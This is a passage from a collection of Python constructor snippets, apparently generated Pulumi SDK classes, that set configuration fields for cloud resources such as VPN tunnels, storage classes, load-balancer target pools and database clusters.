tags)\n if transit_gateway_id is not None:\n pulumi.set(__self__, \"transit_gateway_id\", transit_gateway_id)\n if transport_transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transport_transit_gateway_attachment_id\", transport_transit_gateway_attachment_id)\n if tunnel1_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_action\", tunnel1_dpd_timeout_action)\n if tunnel1_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_seconds\", tunnel1_dpd_timeout_seconds)\n if tunnel1_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel1_enable_tunnel_lifecycle_control\", tunnel1_enable_tunnel_lifecycle_control)\n if tunnel1_ike_versions is not None:\n pulumi.set(__self__, \"tunnel1_ike_versions\", tunnel1_ike_versions)\n if tunnel1_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_cidr\", tunnel1_inside_cidr)\n if tunnel1_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_ipv6_cidr\", tunnel1_inside_ipv6_cidr)\n if tunnel1_log_options is not None:\n 
pulumi.set(__self__, \"tunnel1_log_options\", tunnel1_log_options)\n if tunnel1_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase1_dh_group_numbers\", tunnel1_phase1_dh_group_numbers)\n if tunnel1_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_encryption_algorithms\", tunnel1_phase1_encryption_algorithms)\n if tunnel1_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_integrity_algorithms\", tunnel1_phase1_integrity_algorithms)\n if tunnel1_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase1_lifetime_seconds\", tunnel1_phase1_lifetime_seconds)\n if tunnel1_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase2_dh_group_numbers\", tunnel1_phase2_dh_group_numbers)\n if tunnel1_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_encryption_algorithms\", tunnel1_phase2_encryption_algorithms)\n if tunnel1_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_integrity_algorithms\", tunnel1_phase2_integrity_algorithms)\n if tunnel1_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase2_lifetime_seconds\", tunnel1_phase2_lifetime_seconds)\n if tunnel1_preshared_key is not None:\n pulumi.set(__self__, \"tunnel1_preshared_key\", tunnel1_preshared_key)\n if tunnel1_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel1_rekey_fuzz_percentage\", tunnel1_rekey_fuzz_percentage)\n if tunnel1_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel1_rekey_margin_time_seconds\", tunnel1_rekey_margin_time_seconds)\n if tunnel1_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel1_replay_window_size\", tunnel1_replay_window_size)\n if tunnel1_startup_action is not None:\n pulumi.set(__self__, \"tunnel1_startup_action\", tunnel1_startup_action)\n if tunnel2_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_action\", tunnel2_dpd_timeout_action)\n if tunnel2_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_seconds\", tunnel2_dpd_timeout_seconds)\n if tunnel2_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel2_enable_tunnel_lifecycle_control\", tunnel2_enable_tunnel_lifecycle_control)\n if tunnel2_ike_versions is not None:\n pulumi.set(__self__, \"tunnel2_ike_versions\", tunnel2_ike_versions)\n if tunnel2_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_cidr\", tunnel2_inside_cidr)\n if tunnel2_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_ipv6_cidr\", tunnel2_inside_ipv6_cidr)\n if tunnel2_log_options is not None:\n pulumi.set(__self__, \"tunnel2_log_options\", tunnel2_log_options)\n if tunnel2_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase1_dh_group_numbers\", tunnel2_phase1_dh_group_numbers)\n if tunnel2_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_encryption_algorithms\", tunnel2_phase1_encryption_algorithms)\n if tunnel2_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_integrity_algorithms\", tunnel2_phase1_integrity_algorithms)\n if tunnel2_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase1_lifetime_seconds\", tunnel2_phase1_lifetime_seconds)\n if tunnel2_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase2_dh_group_numbers\", tunnel2_phase2_dh_group_numbers)\n if 
tunnel2_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_encryption_algorithms\", tunnel2_phase2_encryption_algorithms)\n if tunnel2_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_integrity_algorithms\", tunnel2_phase2_integrity_algorithms)\n if tunnel2_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase2_lifetime_seconds\", tunnel2_phase2_lifetime_seconds)\n if tunnel2_preshared_key is not None:\n pulumi.set(__self__, \"tunnel2_preshared_key\", tunnel2_preshared_key)\n if tunnel2_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel2_rekey_fuzz_percentage\", tunnel2_rekey_fuzz_percentage)\n if tunnel2_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel2_rekey_margin_time_seconds\", tunnel2_rekey_margin_time_seconds)\n if tunnel2_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel2_replay_window_size\", tunnel2_replay_window_size)\n if tunnel2_startup_action is not None:\n pulumi.set(__self__, \"tunnel2_startup_action\", tunnel2_startup_action)\n if tunnel_inside_ip_version is not None:\n pulumi.set(__self__, \"tunnel_inside_ip_version\", tunnel_inside_ip_version)\n if vpn_gateway_id is not None:\n pulumi.set(__self__, \"vpn_gateway_id\", vpn_gateway_id)", "def __init__(self, instance, created, signal_type):\n\n self.instance = instance\n self.created = created\n self.signal_type = signal_type", "def __init__(__self__, *,\n name: str,\n allow_volume_expansion: Optional[bool] = None,\n allowed_topologies: Optional[Sequence['outputs.CSIUnitySpecDriverStorageClassAllowedTopologies']] = None,\n default: Optional[bool] = None,\n parameters: Optional[Mapping[str, str]] = None,\n reclaim_policy: Optional[str] = None):\n pulumi.set(__self__, \"name\", name)\n if allow_volume_expansion is not None:\n pulumi.set(__self__, \"allow_volume_expansion\", allow_volume_expansion)\n if allowed_topologies is not None:\n pulumi.set(__self__, \"allowed_topologies\", allowed_topologies)\n if default is not None:\n pulumi.set(__self__, \"default\", default)\n if parameters is not None:\n pulumi.set(__self__, \"parameters\", parameters)\n if reclaim_policy is not None:\n pulumi.set(__self__, \"reclaim_policy\", reclaim_policy)", "def __init__(__self__, *,\n key: pulumi.Input[str],\n name: pulumi.Input[str],\n namespace: pulumi.Input[str]):\n pulumi.set(__self__, \"key\", key)\n pulumi.set(__self__, \"name\", name)\n pulumi.set(__self__, \"namespace\", namespace)", "def __init__(__self__, *,\n discovery_spec: pulumi.Input['ZoneDiscoverySpecArgs'],\n lake: pulumi.Input[str],\n location: pulumi.Input[str],\n resource_spec: pulumi.Input['ZoneResourceSpecArgs'],\n type: pulumi.Input[str],\n description: Optional[pulumi.Input[str]] = None,\n display_name: Optional[pulumi.Input[str]] = None,\n labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"discovery_spec\", discovery_spec)\n pulumi.set(__self__, \"lake\", lake)\n pulumi.set(__self__, \"location\", location)\n pulumi.set(__self__, \"resource_spec\", resource_spec)\n pulumi.set(__self__, \"type\", type)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if display_name is not None:\n pulumi.set(__self__, \"display_name\", display_name)\n if labels is not None:\n pulumi.set(__self__, \"labels\", labels)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n 
if project is not None:\n pulumi.set(__self__, \"project\", project)", "def __init__(__self__, *,\n backup_pool: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n failover_ratio: Optional[pulumi.Input[float]] = None,\n health_checks: Optional[pulumi.Input[str]] = None,\n instances: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n self_link: Optional[pulumi.Input[str]] = None,\n session_affinity: Optional[pulumi.Input[str]] = None):\n if backup_pool is not None:\n pulumi.set(__self__, \"backup_pool\", backup_pool)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if failover_ratio is not None:\n pulumi.set(__self__, \"failover_ratio\", failover_ratio)\n if health_checks is not None:\n pulumi.set(__self__, \"health_checks\", health_checks)\n if instances is not None:\n pulumi.set(__self__, \"instances\", instances)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if project is not None:\n pulumi.set(__self__, \"project\", project)\n if region is not None:\n pulumi.set(__self__, \"region\", region)\n if self_link is not None:\n pulumi.set(__self__, \"self_link\", self_link)\n if session_affinity is not None:\n pulumi.set(__self__, \"session_affinity\", session_affinity)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n approved_subscriptions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n instance_id: Optional[pulumi.Input[int]] = None,\n sleep: Optional[pulumi.Input[int]] = None,\n timeout: Optional[pulumi.Input[int]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n lab_name: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n user_name: pulumi.Input[str],\n arm_template_display_name: Optional[pulumi.Input[str]] = None,\n deployment_properties: Optional[pulumi.Input['EnvironmentDeploymentPropertiesArgs']] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"lab_name\", lab_name)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n pulumi.set(__self__, \"user_name\", user_name)\n if arm_template_display_name is not None:\n pulumi.set(__self__, \"arm_template_display_name\", arm_template_display_name)\n if deployment_properties is not None:\n pulumi.set(__self__, \"deployment_properties\", deployment_properties)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)", "def __init__(__self__, *,\n name: str,\n allow_volume_expansion: Optional[bool] = None,\n allowed_topologies: Optional[Sequence['outputs.CSIVXFlexOSSpecDriverStorageClassAllowedTopologies']] = None,\n default: Optional[bool] = None,\n parameters: Optional[Mapping[str, str]] = None,\n reclaim_policy: Optional[str] = None):\n pulumi.set(__self__, \"name\", name)\n if allow_volume_expansion is not None:\n pulumi.set(__self__, \"allow_volume_expansion\", allow_volume_expansion)\n if allowed_topologies is not None:\n pulumi.set(__self__, \"allowed_topologies\", allowed_topologies)\n if default is not None:\n pulumi.set(__self__, \"default\", default)\n if parameters is not None:\n pulumi.set(__self__, 
\"parameters\", parameters)\n if reclaim_policy is not None:\n pulumi.set(__self__, \"reclaim_policy\", reclaim_policy)", "def __init__(__self__, *,\n spec: Optional[pulumi.Input['InstanceSpecArgs']] = None):\n if spec is not None:\n pulumi.set(__self__, \"spec\", spec)", "def __init__(__self__, *,\n type_name: Optional[pulumi.Input[str]] = None,\n type_version_arn: Optional[pulumi.Input[str]] = None,\n version_id: Optional[pulumi.Input[str]] = None):\n if type_name is not None:\n pulumi.set(__self__, \"type_name\", type_name)\n if type_version_arn is not None:\n pulumi.set(__self__, \"type_version_arn\", type_version_arn)\n if version_id is not None:\n pulumi.set(__self__, \"version_id\", version_id)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n type_name: Optional[pulumi.Input[str]] = None,\n type_version_arn: Optional[pulumi.Input[str]] = None,\n version_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n force: Optional[pulumi.Input[bool]] = None,\n instance_id: Optional[pulumi.Input[str]] = None,\n state: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n backup_pool: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n failover_ratio: Optional[pulumi.Input[float]] = None,\n health_checks: Optional[pulumi.Input[str]] = None,\n instances: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n session_affinity: Optional[pulumi.Input[str]] = None):\n if backup_pool is not None:\n pulumi.set(__self__, \"backup_pool\", backup_pool)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if failover_ratio is not None:\n pulumi.set(__self__, \"failover_ratio\", failover_ratio)\n if health_checks is not None:\n pulumi.set(__self__, \"health_checks\", health_checks)\n if instances is not None:\n pulumi.set(__self__, \"instances\", instances)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if project is not None:\n pulumi.set(__self__, \"project\", project)\n if region is not None:\n pulumi.set(__self__, \"region\", region)\n if session_affinity is not None:\n pulumi.set(__self__, \"session_affinity\", session_affinity)", "def __init__(__self__, *,\n name: str,\n allow_volume_expansion: Optional[bool] = None,\n allowed_topologies: Optional[Sequence['outputs.CSIIsilonSpecDriverStorageClassAllowedTopologies']] = None,\n default: Optional[bool] = None,\n parameters: Optional[Mapping[str, str]] = None,\n reclaim_policy: Optional[str] = None):\n pulumi.set(__self__, \"name\", name)\n if allow_volume_expansion is not None:\n pulumi.set(__self__, \"allow_volume_expansion\", allow_volume_expansion)\n if allowed_topologies is not None:\n pulumi.set(__self__, \"allowed_topologies\", allowed_topologies)\n if default is not None:\n pulumi.set(__self__, \"default\", default)\n if parameters is not None:\n pulumi.set(__self__, \"parameters\", parameters)\n if reclaim_policy is not None:\n pulumi.set(__self__, \"reclaim_policy\", reclaim_policy)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n customer_gateway_id: Optional[pulumi.Input[str]] = None,\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: 
Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input[pulumi.InputType['VpnConnectionTunnel1LogOptionsArgs']]] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input[pulumi.InputType['VpnConnectionTunnel2LogOptionsArgs']]] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n 
tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n file_shares: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FileShareConfigArgs']]]]] = None,\n instance_id: Optional[pulumi.Input[str]] = None,\n kms_key_name: Optional[pulumi.Input[str]] = None,\n labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n location: Optional[pulumi.Input[str]] = None,\n networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkConfigArgs']]]]] = None,\n project: Optional[pulumi.Input[str]] = None,\n tier: Optional[pulumi.Input['InstanceTier']] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n license_count: Optional[pulumi.Input[int]] = None,\n license_count_hard_limit: Optional[pulumi.Input[bool]] = None,\n license_counting_type: Optional[pulumi.Input[str]] = None,\n license_rules: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n name: Optional[pulumi.Input[str]] = None,\n owner_account_id: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if license_count is not None:\n pulumi.set(__self__, \"license_count\", license_count)\n if license_count_hard_limit is not None:\n pulumi.set(__self__, \"license_count_hard_limit\", license_count_hard_limit)\n if license_counting_type is not None:\n pulumi.set(__self__, \"license_counting_type\", license_counting_type)\n if license_rules is not None:\n pulumi.set(__self__, \"license_rules\", license_rules)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if owner_account_id is not None:\n pulumi.set(__self__, \"owner_account_id\", owner_account_id)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)", "def __init__(__self__, *,\n control_node_id: pulumi.Input[str],\n display_name: pulumi.Input[str],\n probe_type: pulumi.Input[str],\n arp: Optional[pulumi.Input[bool]] = None,\n honeypot_bind_lists: Optional[pulumi.Input[Sequence[pulumi.Input['HoneypotProbeHoneypotBindListArgs']]]] = None,\n ping: Optional[pulumi.Input[bool]] = None,\n probe_version: Optional[pulumi.Input[str]] = None,\n proxy_ip: Optional[pulumi.Input[str]] = None,\n service_ip_lists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n uuid: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"control_node_id\", control_node_id)\n pulumi.set(__self__, \"display_name\", display_name)\n pulumi.set(__self__, \"probe_type\", probe_type)\n if arp is not None:\n pulumi.set(__self__, \"arp\", arp)\n if honeypot_bind_lists is not None:\n pulumi.set(__self__, \"honeypot_bind_lists\", 
honeypot_bind_lists)\n if ping is not None:\n pulumi.set(__self__, \"ping\", ping)\n if probe_version is not None:\n pulumi.set(__self__, \"probe_version\", probe_version)\n if proxy_ip is not None:\n pulumi.set(__self__, \"proxy_ip\", proxy_ip)\n if service_ip_lists is not None:\n pulumi.set(__self__, \"service_ip_lists\", service_ip_lists)\n if uuid is not None:\n pulumi.set(__self__, \"uuid\", uuid)\n if vpc_id is not None:\n pulumi.set(__self__, \"vpc_id\", vpc_id)", "def __init__(self,\r\n external_ids=None,\r\n harsh_accel_setting=None,\r\n name=None):\r\n\r\n # Initialize members of the class\r\n self.external_ids = external_ids\r\n self.harsh_accel_setting = harsh_accel_setting\r\n self.name = name", "def __init__(self, name, layer):\n self.name = name\n self.layer = layer\n self.kind = \"Abstract\"\n self.slot = None", "def __init__(__self__, *,\n auto_renew: Optional[pulumi.Input[bool]] = None,\n auto_renew_period: Optional[pulumi.Input[int]] = None,\n cluster_name: Optional[pulumi.Input[str]] = None,\n data_center_name: Optional[pulumi.Input[str]] = None,\n disk_size: Optional[pulumi.Input[int]] = None,\n disk_type: Optional[pulumi.Input[str]] = None,\n enable_public: Optional[pulumi.Input[bool]] = None,\n instance_type: Optional[pulumi.Input[str]] = None,\n ip_white: Optional[pulumi.Input[str]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n major_version: Optional[pulumi.Input[str]] = None,\n node_count: Optional[pulumi.Input[int]] = None,\n password: Optional[pulumi.Input[str]] = None,\n pay_type: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[int]] = None,\n period_unit: Optional[pulumi.Input[str]] = None,\n public_points: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n status: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None):\n if auto_renew is not None:\n pulumi.set(__self__, \"auto_renew\", auto_renew)\n if auto_renew_period is not None:\n pulumi.set(__self__, \"auto_renew_period\", auto_renew_period)\n if cluster_name is not None:\n pulumi.set(__self__, \"cluster_name\", cluster_name)\n if data_center_name is not None:\n pulumi.set(__self__, \"data_center_name\", data_center_name)\n if disk_size is not None:\n pulumi.set(__self__, \"disk_size\", disk_size)\n if disk_type is not None:\n pulumi.set(__self__, \"disk_type\", disk_type)\n if enable_public is not None:\n pulumi.set(__self__, \"enable_public\", enable_public)\n if instance_type is not None:\n pulumi.set(__self__, \"instance_type\", instance_type)\n if ip_white is not None:\n pulumi.set(__self__, \"ip_white\", ip_white)\n if maintain_end_time is not None:\n pulumi.set(__self__, \"maintain_end_time\", maintain_end_time)\n if maintain_start_time is not None:\n pulumi.set(__self__, \"maintain_start_time\", maintain_start_time)\n if major_version is not None:\n pulumi.set(__self__, \"major_version\", major_version)\n if node_count is not None:\n pulumi.set(__self__, \"node_count\", node_count)\n if password is not None:\n pulumi.set(__self__, \"password\", password)\n if pay_type is not None:\n pulumi.set(__self__, \"pay_type\", pay_type)\n if period is not None:\n pulumi.set(__self__, \"period\", period)\n if period_unit is not None:\n pulumi.set(__self__, \"period_unit\", period_unit)\n 
if public_points is not None:\n pulumi.set(__self__, \"public_points\", public_points)\n if security_groups is not None:\n pulumi.set(__self__, \"security_groups\", security_groups)\n if status is not None:\n pulumi.set(__self__, \"status\", status)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if vswitch_id is not None:\n pulumi.set(__self__, \"vswitch_id\", vswitch_id)\n if zone_id is not None:\n pulumi.set(__self__, \"zone_id\", zone_id)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n enabled: Optional[pulumi.Input[bool]] = None,\n instance_id: Optional[pulumi.Input[int]] = None,\n message_type: Optional[pulumi.Input[str]] = None,\n queue_regex: Optional[pulumi.Input[str]] = None,\n recipients: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n reminder_interval: Optional[pulumi.Input[int]] = None,\n time_threshold: Optional[pulumi.Input[int]] = None,\n type: Optional[pulumi.Input[str]] = None,\n value_calculation: Optional[pulumi.Input[str]] = None,\n value_threshold: Optional[pulumi.Input[int]] = None,\n vhost_regex: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n extended_location: pulumi.Input['ExtendedLocationArgs'],\n l3_isolation_domain_id: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n vlan: pulumi.Input[float],\n hybrid_aks_ipam_enabled: Optional[pulumi.Input[Union[str, 'HybridAksIpamEnabled']]] = None,\n hybrid_aks_plugin_type: Optional[pulumi.Input[Union[str, 'HybridAksPluginType']]] = None,\n interface_name: Optional[pulumi.Input[str]] = None,\n ip_allocation_type: Optional[pulumi.Input[Union[str, 'IpAllocationType']]] = None,\n ipv4_connected_prefix: Optional[pulumi.Input[str]] = None,\n ipv6_connected_prefix: Optional[pulumi.Input[str]] = None,\n l3_network_name: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"extended_location\", extended_location)\n pulumi.set(__self__, \"l3_isolation_domain_id\", l3_isolation_domain_id)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n pulumi.set(__self__, \"vlan\", vlan)\n if hybrid_aks_ipam_enabled is None:\n hybrid_aks_ipam_enabled = 'True'\n if hybrid_aks_ipam_enabled is not None:\n pulumi.set(__self__, \"hybrid_aks_ipam_enabled\", hybrid_aks_ipam_enabled)\n if hybrid_aks_plugin_type is None:\n hybrid_aks_plugin_type = 'SRIOV'\n if hybrid_aks_plugin_type is not None:\n pulumi.set(__self__, \"hybrid_aks_plugin_type\", hybrid_aks_plugin_type)\n if interface_name is not None:\n pulumi.set(__self__, \"interface_name\", interface_name)\n if ip_allocation_type is None:\n ip_allocation_type = 'DualStack'\n if ip_allocation_type is not None:\n pulumi.set(__self__, \"ip_allocation_type\", ip_allocation_type)\n if ipv4_connected_prefix is not None:\n pulumi.set(__self__, \"ipv4_connected_prefix\", ipv4_connected_prefix)\n if ipv6_connected_prefix is not None:\n pulumi.set(__self__, \"ipv6_connected_prefix\", ipv6_connected_prefix)\n if l3_network_name is not None:\n pulumi.set(__self__, \"l3_network_name\", l3_network_name)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n ipv6_gateway_name: Optional[pulumi.Input[str]] = 
None,\n resource_group_id: Optional[pulumi.Input[str]] = None,\n spec: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n container_registry_name: Optional[pulumi.Input[str]] = None,\n instance_count: Optional[pulumi.Input[int]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tier: Optional[pulumi.Input[str]] = None,\n virtual_network_subnet_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n name: Optional[pulumi.Input[str]] = None,\n namespace: Optional[pulumi.Input[str]] = None):\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if 